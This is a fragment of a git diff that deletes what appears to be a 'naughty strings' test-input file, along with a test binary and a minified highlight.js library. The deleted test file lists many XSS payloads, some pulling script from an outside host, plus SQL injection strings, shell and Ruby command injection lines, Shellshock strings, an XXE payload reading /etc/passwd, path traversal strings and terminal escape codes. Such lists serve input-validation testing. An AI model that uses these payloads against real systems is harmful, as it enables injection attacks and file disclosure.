style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF -ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF -ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF -ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF -ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF -<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a> -<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a> -`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)> -`"'><img src=xxx:x \x22onerror=javascript:alert(1)> -`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)> -`"'><img src=xxx:x \x0Donerror=javascript:alert(1)> -`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)> -`"'><img src=xxx:x \x09onerror=javascript:alert(1)> -`"'><img src=xxx:x \x0Conerror=javascript:alert(1)> -`"'><img src=xxx:x \x00onerror=javascript:alert(1)> -`"'><img src=xxx:x \x27onerror=javascript:alert(1)> -`"'><img src=xxx:x \x20onerror=javascript:alert(1)> -"`'><script>\x3Bjavascript:alert(1)</script> -"`'><script>\x0Djavascript:alert(1)</script> -"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> -"`'><script>\xE2\x80\x81javascript:alert(1)</script> -"`'><script>\xE2\x80\x84javascript:alert(1)</script> -"`'><script>\xE3\x80\x80javascript:alert(1)</script> -"`'><script>\x09javascript:alert(1)</script> -"`'><script>\xE2\x80\x89javascript:alert(1)</script> -"`'><script>\xE2\x80\x85javascript:alert(1)</script> -"`'><script>\xE2\x80\x88javascript:alert(1)</script> -"`'><script>\x00javascript:alert(1)</script> -"`'><script>\xE2\x80\xA8javascript:alert(1)</script> -"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> -"`'><script>\xE1\x9A\x80javascript:alert(1)</script> -"`'><script>\x0Cjavascript:alert(1)</script> -"`'><script>\x2Bjavascript:alert(1)</script> -"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> -"`'><script>-javascript:alert(1)</script> -"`'><script>\x0Ajavascript:alert(1)</script> -"`'><script>\xE2\x80\xAFjavascript:alert(1)</script> -"`'><script>\x7Ejavascript:alert(1)</script> -"`'><script>\xE2\x80\x87javascript:alert(1)</script> -"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script> -"`'><script>\xE2\x80\xA9javascript:alert(1)</script> -"`'><script>\xC2\x85javascript:alert(1)</script> -"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script> -"`'><script>\xE2\x80\x83javascript:alert(1)</script> -"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script> -"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script> -"`'><script>\xE2\x80\x80javascript:alert(1)</script> -"`'><script>\x21javascript:alert(1)</script> -"`'><script>\xE2\x80\x82javascript:alert(1)</script> -"`'><script>\xE2\x80\x86javascript:alert(1)</script> -"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script> -"`'><script>\x0Bjavascript:alert(1)</script> -"`'><script>\x20javascript:alert(1)</script> -"`'><script>\xC2\xA0javascript:alert(1)</script> -<img \x00src=x onerror="alert(1)"> -<img \x47src=x onerror="javascript:alert(1)"> -<img \x11src=x onerror="javascript:alert(1)"> -<img \x12src=x onerror="javascript:alert(1)"> -<img\x47src=x onerror="javascript:alert(1)"> -<img\x10src=x onerror="javascript:alert(1)"> -<img\x13src=x onerror="javascript:alert(1)"> -<img\x32src=x onerror="javascript:alert(1)"> -<img\x47src=x onerror="javascript:alert(1)"> -<img\x11src=x onerror="javascript:alert(1)"> -<img \x47src=x onerror="javascript:alert(1)"> -<img \x34src=x onerror="javascript:alert(1)"> -<img \x39src=x onerror="javascript:alert(1)"> -<img \x00src=x onerror="javascript:alert(1)"> -<img src\x09=x onerror="javascript:alert(1)"> -<img src\x10=x onerror="javascript:alert(1)"> -<img src\x13=x onerror="javascript:alert(1)"> -<img src\x32=x onerror="javascript:alert(1)"> -<img src\x12=x onerror="javascript:alert(1)"> -<img src\x11=x onerror="javascript:alert(1)"> -<img src\x00=x onerror="javascript:alert(1)"> -<img src\x47=x onerror="javascript:alert(1)"> -<img src=x\x09onerror="javascript:alert(1)"> -<img src=x\x10onerror="javascript:alert(1)"> -<img src=x\x11onerror="javascript:alert(1)"> -<img src=x\x12onerror="javascript:alert(1)"> -<img src=x\x13onerror="javascript:alert(1)"> -<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> -<img src=x onerror=\x09"javascript:alert(1)"> -<img src=x onerror=\x10"javascript:alert(1)"> -<img src=x onerror=\x11"javascript:alert(1)"> -<img src=x onerror=\x12"javascript:alert(1)"> -<img src=x onerror=\x32"javascript:alert(1)"> -<img src=x onerror=\x00"javascript:alert(1)"> -<a href=javascript:javascript:alert(1)>XXX</a> -<img src="x` `<script>javascript:alert(1)</script>"` `> -<img src onerror /" '"= alt=javascript:alert(1)//"> -<title onpropertychange=javascript:alert(1)></title><title title=> -<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> -<!--[if]><script>javascript:alert(1)</script --> -<!--[if<img src=x onerror=javascript:alert(1)//]> --> -<script src="/\%(jscript)s"></script> -<script src="\\%(jscript)s"></script> -<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> -<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> -<IMG SRC=# onmouseover="alert('xxs')"> -<IMG SRC= onmouseover="alert('xxs')"> -<IMG onmouseover="alert('xxs')"> -<IMG SRC=javascript:alert('XSS')> -<IMG SRC=javascript:alert('XSS')> -<IMG SRC=javascript:alert('XSS')> -<IMG SRC="jav ascript:alert('XSS');"> -<IMG SRC="jav	ascript:alert('XSS');"> -<IMG SRC="jav
ascript:alert('XSS');"> -<IMG SRC="jav
ascript:alert('XSS');"> -perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out -<IMG SRC="  javascript:alert('XSS');"> -<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> -<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> -<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> -<<SCRIPT>alert("XSS");//<</SCRIPT> -<SCRIPT SRC=http://ha.ckers.org/xss.js?< B > -<SCRIPT SRC=//ha.ckers.org/.j> -<IMG SRC="javascript:alert('XSS')" -<iframe src=http://ha.ckers.org/scriptlet.html < -\";alert('XSS');// -<u oncopy=alert()> Copy me</u> -<i onwheel=alert(1)> Scroll over me </i> -<plaintext> -http://a/%%30%30 -</textarea><script>alert(123)</script> - -# SQL Injection -# -# Strings which can cause a SQL injection if inputs are not sanitized - -1;DROP TABLE users -1'; DROP TABLE users-- 1 -' OR 1=1 -- 1 -' OR '1'='1 - -% -_ - -# Server Code Injection -# -# Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153) - -- --- ---version ---help -$USER -/dev/null; touch /tmp/blns.fail ; echo -`touch /tmp/blns.fail` -$(touch /tmp/blns.fail) -@{[system "touch /tmp/blns.fail"]} - -# Command Injection (Ruby) -# -# Strings which can call system commands within Ruby/Rails applications - -eval("puts 'hello world'") -System("ls -al /") -`ls -al /` -Kernel.exec("ls -al /") -Kernel.exit(1) -%x('ls -al /') - -# XXE Injection (XML) -# -# String which can reveal system files when parsed by a badly configured XML parser - -<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo> - -# Unwanted Interpolation -# -# Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string. - -$HOME -$ENV{'HOME'} -%d -%s -{0} -%*.*s -File:/// - -# File Inclusion -# -# Strings which can cause user to pull in files that should not be a part of a web server - -../../../../../../../../../../../etc/passwd%00 -../../../../../../../../../../../etc/hosts - -# Known CVEs and Vulnerabilities -# -# Strings that test for known vulnerabilities - -() { 0; }; touch /tmp/blns.shellshock1.fail; -() { _; } >_[$($())] { touch /tmp/blns.shellshock2.fail; } -<<< %s(un='%s') = %u -+++ATH0 - -# MSDOS/Windows Special Filenames -# -# Strings which are reserved characters in MSDOS/Windows - -CON -PRN -AUX -CLOCK$ -NUL -A: -ZZ: -COM1 -LPT1 -LPT2 -LPT3 -COM2 -COM3 -COM4 - -# IRC specific strings -# -# Strings that may occur on IRC clients that make security products freak out - -DCC SEND STARTKEYLOGGER 0 0 0 - -# Scunthorpe Problem -# -# Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem) - -Scunthorpe General Hospital -Penistone Community Church -Lightwater Country Park -Jimmy Clitheroe -Horniman Museum -shitake mushrooms -RomansInSussex.co.uk -http://www.cum.qc.ca/ -Craig Cockburn, Software Specialist -Linda Callahan -Dr. Herman I. Libshitz -magna cum laude -Super Bowl XXX -medieval erection of parapets -evaluate -mocha -expression -Arsenal canal -classic -Tyson Gay -Dick Van Dyke -basement - -# Human injection -# -# Strings which may cause human to reinterpret worldview - -If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you. - -# Terminal escape codes -# -# Strings which punish the fools who use cat/type on this file - -Roses are [0;31mred[0m, violets are [0;34mblue. Hope you enjoy terminal hue -But now...[20Cfor my greatest trick...[8m -The quick brown fox... [Beeeep] - -# iOS Vulnerabilities -# -# Strings which crashed iMessage in various versions of iOS - -Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗 -🏳0🌈️
\ No newline at end of file diff --git a/src/test_resources/ubuntu_444_800x600_0chrom_0lum.bin b/src/test_resources/ubuntu_444_800x600_0chrom_0lum.bin Binary files differdeleted file mode 100644 index 929540c365..0000000000 --- a/src/test_resources/ubuntu_444_800x600_0chrom_0lum.bin +++ /dev/null diff --git a/static/highlight.pack.js b/static/highlight.pack.js deleted file mode 100644 index 3d71c4af18..0000000000 --- a/static/highlight.pack.js +++ /dev/null @@ -1,2 +0,0 @@ -/*! highlight.js v9.12.0 | BSD3 License | git.io/hljslicense */ -!function(e){var n="object"==typeof window&&window||"object"==typeof self&&self;"undefined"!=typeof exports?e(exports):n&&(n.hljs=e({}),"function"==typeof define&&define.amd&&define([],function(){return n.hljs}))}(function(e){function n(e){return e.replace(/&/g,"&").replace(/</g,"<").replace(/>/g,">")}function t(e){return e.nodeName.toLowerCase()}function r(e,n){var t=e&&e.exec(n);return t&&0===t.index}function a(e){return k.test(e)}function i(e){var n,t,r,i,o=e.className+" ";if(o+=e.parentNode?e.parentNode.className:"",t=B.exec(o))return w(t[1])?t[1]:"no-highlight";for(o=o.split(/\s+/),n=0,r=o.length;r>n;n++)if(i=o[n],a(i)||w(i))return i}function o(e){var n,t={},r=Array.prototype.slice.call(arguments,1);for(n in e)t[n]=e[n];return r.forEach(function(e){for(n in e)t[n]=e[n]}),t}function u(e){var n=[];return function r(e,a){for(var i=e.firstChild;i;i=i.nextSibling)3===i.nodeType?a+=i.nodeValue.length:1===i.nodeType&&(n.push({event:"start",offset:a,node:i}),a=r(i,a),t(i).match(/br|hr|img|input/)||n.push({event:"stop",offset:a,node:i}));return a}(e,0),n}function c(e,r,a){function i(){return e.length&&r.length?e[0].offset!==r[0].offset?e[0].offset<r[0].offset?e:r:"start"===r[0].event?e:r:e.length?e:r}function o(e){function r(e){return" "+e.nodeName+'="'+n(e.value).replace('"',""")+'"'}s+="<"+t(e)+E.map.call(e.attributes,r).join("")+">"}function u(e){s+="</"+t(e)+">"}function c(e){("start"===e.event?o:u)(e.node)}for(var l=0,s="",f=[];e.length||r.length;){var g=i();if(s+=n(a.substring(l,g[0].offset)),l=g[0].offset,g===e){f.reverse().forEach(u);do c(g.splice(0,1)[0]),g=i();while(g===e&&g.length&&g[0].offset===l);f.reverse().forEach(o)}else"start"===g[0].event?f.push(g[0].node):f.pop(),c(g.splice(0,1)[0])}return s+n(a.substr(l))}function l(e){return e.v&&!e.cached_variants&&(e.cached_variants=e.v.map(function(n){return o(e,{v:null},n)})),e.cached_variants||e.eW&&[o(e)]||[e]}function s(e){function n(e){return e&&e.source||e}function t(t,r){return new RegExp(n(t),"m"+(e.cI?"i":"")+(r?"g":""))}function r(a,i){if(!a.compiled){if(a.compiled=!0,a.k=a.k||a.bK,a.k){var o={},u=function(n,t){e.cI&&(t=t.toLowerCase()),t.split(" ").forEach(function(e){var t=e.split("|");o[t[0]]=[n,t[1]?Number(t[1]):1]})};"string"==typeof a.k?u("keyword",a.k):x(a.k).forEach(function(e){u(e,a.k[e])}),a.k=o}a.lR=t(a.l||/\w+/,!0),i&&(a.bK&&(a.b="\\b("+a.bK.split(" ").join("|")+")\\b"),a.b||(a.b=/\B|\b/),a.bR=t(a.b),a.e||a.eW||(a.e=/\B|\b/),a.e&&(a.eR=t(a.e)),a.tE=n(a.e)||"",a.eW&&i.tE&&(a.tE+=(a.e?"|":"")+i.tE)),a.i&&(a.iR=t(a.i)),null==a.r&&(a.r=1),a.c||(a.c=[]),a.c=Array.prototype.concat.apply([],a.c.map(function(e){return l("self"===e?a:e)})),a.c.forEach(function(e){r(e,a)}),a.starts&&r(a.starts,i);var c=a.c.map(function(e){return e.bK?"\\.?("+e.b+")\\.?":e.b}).concat([a.tE,a.i]).map(n).filter(Boolean);a.t=c.length?t(c.join("|"),!0):{exec:function(){return null}}}}r(e)}function f(e,t,a,i){function o(e,n){var t,a;for(t=0,a=n.c.length;a>t;t++)if(r(n.c[t].bR,e))return n.c[t]}function u(e,n){if(r(e.eR,n)){for(;e.endsParent&&e.parent;)e=e.parent;return e}return e.eW?u(e.parent,n):void 0}function c(e,n){return!a&&r(n.iR,e)}function l(e,n){var t=N.cI?n[0].toLowerCase():n[0];return e.k.hasOwnProperty(t)&&e.k[t]}function p(e,n,t,r){var a=r?"":I.classPrefix,i='<span class="'+a,o=t?"":C;return i+=e+'">',i+n+o}function h(){var e,t,r,a;if(!E.k)return n(k);for(a="",t=0,E.lR.lastIndex=0,r=E.lR.exec(k);r;)a+=n(k.substring(t,r.index)),e=l(E,r),e?(B+=e[1],a+=p(e[0],n(r[0]))):a+=n(r[0]),t=E.lR.lastIndex,r=E.lR.exec(k);return a+n(k.substr(t))}function d(){var e="string"==typeof E.sL;if(e&&!y[E.sL])return n(k);var t=e?f(E.sL,k,!0,x[E.sL]):g(k,E.sL.length?E.sL:void 0);return E.r>0&&(B+=t.r),e&&(x[E.sL]=t.top),p(t.language,t.value,!1,!0)}function b(){L+=null!=E.sL?d():h(),k=""}function v(e){L+=e.cN?p(e.cN,"",!0):"",E=Object.create(e,{parent:{value:E}})}function m(e,n){if(k+=e,null==n)return b(),0;var t=o(n,E);if(t)return t.skip?k+=n:(t.eB&&(k+=n),b(),t.rB||t.eB||(k=n)),v(t,n),t.rB?0:n.length;var r=u(E,n);if(r){var a=E;a.skip?k+=n:(a.rE||a.eE||(k+=n),b(),a.eE&&(k=n));do E.cN&&(L+=C),E.skip||(B+=E.r),E=E.parent;while(E!==r.parent);return r.starts&&v(r.starts,""),a.rE?0:n.length}if(c(n,E))throw new Error('Illegal lexeme "'+n+'" for mode "'+(E.cN||"<unnamed>")+'"');return k+=n,n.length||1}var N=w(e);if(!N)throw new Error('Unknown language: "'+e+'"');s(N);var R,E=i||N,x={},L="";for(R=E;R!==N;R=R.parent)R.cN&&(L=p(R.cN,"",!0)+L);var k="",B=0;try{for(var M,j,O=0;;){if(E.t.lastIndex=O,M=E.t.exec(t),!M)break;j=m(t.substring(O,M.index),M[0]),O=M.index+j}for(m(t.substr(O)),R=E;R.parent;R=R.parent)R.cN&&(L+=C);return{r:B,value:L,language:e,top:E}}catch(T){if(T.message&&-1!==T.message.indexOf("Illegal"))return{r:0,value:n(t)};throw T}}function g(e,t){t=t||I.languages||x(y);var r={r:0,value:n(e)},a=r;return t.filter(w).forEach(function(n){var t=f(n,e,!1);t.language=n,t.r>a.r&&(a=t),t.r>r.r&&(a=r,r=t)}),a.language&&(r.second_best=a),r}function p(e){return I.tabReplace||I.useBR?e.replace(M,function(e,n){return I.useBR&&"\n"===e?"<br>":I.tabReplace?n.replace(/\t/g,I.tabReplace):""}):e}function h(e,n,t){var r=n?L[n]:t,a=[e.trim()];return e.match(/\bhljs\b/)||a.push("hljs"),-1===e.indexOf(r)&&a.push(r),a.join(" ").trim()}function d(e){var n,t,r,o,l,s=i(e);a(s)||(I.useBR?(n=document.createElementNS("http://www.w3.org/1999/xhtml","div"),n.innerHTML=e.innerHTML.replace(/\n/g,"").replace(/<br[ \/]*>/g,"\n")):n=e,l=n.textContent,r=s?f(s,l,!0):g(l),t=u(n),t.length&&(o=document.createElementNS("http://www.w3.org/1999/xhtml","div"),o.innerHTML=r.value,r.value=c(t,u(o),l)),r.value=p(r.value),e.innerHTML=r.value,e.className=h(e.className,s,r.language),e.result={language:r.language,re:r.r},r.second_best&&(e.second_best={language:r.second_best.language,re:r.second_best.r}))}function b(e){I=o(I,e)}function v(){if(!v.called){v.called=!0;var e=document.querySelectorAll("pre code");E.forEach.call(e,d)}}function m(){addEventListener("DOMContentLoaded",v,!1),addEventListener("load",v,!1)}function N(n,t){var r=y[n]=t(e);r.aliases&&r.aliases.forEach(function(e){L[e]=n})}function R(){return x(y)}function w(e){return e=(e||"").toLowerCase(),y[e]||y[L[e]]}var E=[],x=Object.keys,y={},L={},k=/^(no-?highlight|plain|text)$/i,B=/\blang(?:uage)?-([\w-]+)\b/i,M=/((^(<[^>]+>|\t|)+|(?:\n)))/gm,C="</span>",I={classPrefix:"hljs-",tabReplace:null,useBR:!1,languages:void 0};return e.highlight=f,e.highlightAuto=g,e.fixMarkup=p,e.highlightBlock=d,e.configure=b,e.initHighlighting=v,e.initHighlightingOnLoad=m,e.registerLanguage=N,e.listLanguages=R,e.getLanguage=w,e.inherit=o,e.IR="[a-zA-Z]\\w*",e.UIR="[a-zA-Z_]\\w*",e.NR="\\b\\d+(\\.\\d+)?",e.CNR="(-?)(\\b0[xX][a-fA-F0-9]+|(\\b\\d+(\\.\\d*)?|\\.\\d+)([eE][-+]?\\d+)?)",e.BNR="\\b(0b[01]+)",e.RSR="!|!=|!==|%|%=|&|&&|&=|\\*|\\*=|\\+|\\+=|,|-|-=|/=|/|:|;|<<|<<=|<=|<|===|==|=|>>>=|>>=|>=|>>>|>>|>|\\?|\\[|\\{|\\(|\\^|\\^=|\\||\\|=|\\|\\||~",e.BE={b:"\\\\[\\s\\S]",r:0},e.ASM={cN:"string",b:"'",e:"'",i:"\\n",c:[e.BE]},e.QSM={cN:"string",b:'"',e:'"',i:"\\n",c:[e.BE]},e.PWM={b:/\b(a|an|the|are|I'm|isn't|don't|doesn't|won't|but|just|should|pretty|simply|enough|gonna|going|wtf|so|such|will|you|your|they|like|more)\b/},e.C=function(n,t,r){var a=e.inherit({cN:"comment",b:n,e:t,c:[]},r||{});return a.c.push(e.PWM),a.c.push({cN:"doctag",b:"(?:TODO|FIXME|NOTE|BUG|XXX):",r:0}),a},e.CLCM=e.C("//","$"),e.CBCM=e.C("/\\*","\\*/"),e.HCM=e.C("#","$"),e.NM={cN:"number",b:e.NR,r:0},e.CNM={cN:"number",b:e.CNR,r:0},e.BNM={cN:"number",b:e.BNR,r:0},e.CSSNM={cN:"number",b:e.NR+"(%|em|ex|ch|rem|vw|vh|vmin|vmax|cm|mm|in|pt|pc|px|deg|grad|rad|turn|s|ms|Hz|kHz|dpi|dpcm|dppx)?",r:0},e.RM={cN:"regexp",b:/\//,e:/\/[gimuy]*/,i:/\n/,c:[e.BE,{b:/\[/,e:/\]/,r:0,c:[e.BE]}]},e.TM={cN:"title",b:e.IR,r:0},e.UTM={cN:"title",b:e.UIR,r:0},e.METHOD_GUARD={b:"\\.\\s*"+e.UIR,r:0},e});hljs.registerLanguage("json",function(e){var i={literal:"true false null"},n=[e.QSM,e.CNM],r={e:",",eW:!0,eE:!0,c:n,k:i},t={b:"{",e:"}",c:[{cN:"attr",b:/"/,e:/"/,c:[e.BE],i:"\\n"},e.inherit(r,{b:/:/})],i:"\\S"},c={b:"\\[",e:"\\]",c:[e.inherit(r)],i:"\\S"};return n.splice(n.length,0,t,c),{c:n,k:i,i:"\\S"}});
\ No newline at end of file |